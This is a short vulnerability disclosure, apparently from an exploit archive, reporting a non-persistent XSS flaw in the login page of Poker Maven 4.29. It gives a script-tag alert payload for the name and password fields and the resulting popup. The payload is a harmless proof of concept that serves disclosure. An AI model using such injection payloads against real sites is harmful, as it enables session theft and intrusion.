facebook facebook twitter rss

Non-Persistant XSS on Poker Maven Version 4.29

Author: crunchx , Published: 15-09-2014
# Exploit Title:- Non-Persistant XSS on Poker Maven Version 4.29
# Date:- 05-Sep-2014
# Exploit Author:- crunchx
# Vendor Homepage:- https://www.briggsoft.com/pmavens.htm
# Version:- Poker Maven Version 4.29 (Latest)
# Tested On:-
OS=> Windows 7
Browser=> Mozilla Firefox

# Description:- In the login page type this,

Player Name:- <script>alert("xss")</script>
Password:- <script>alert("xss")</script>

After clicking "OK" , it will excute that javascript & a pop up message xss will be shown.

I have attached a picture of the executed result.

Like us on Facebook :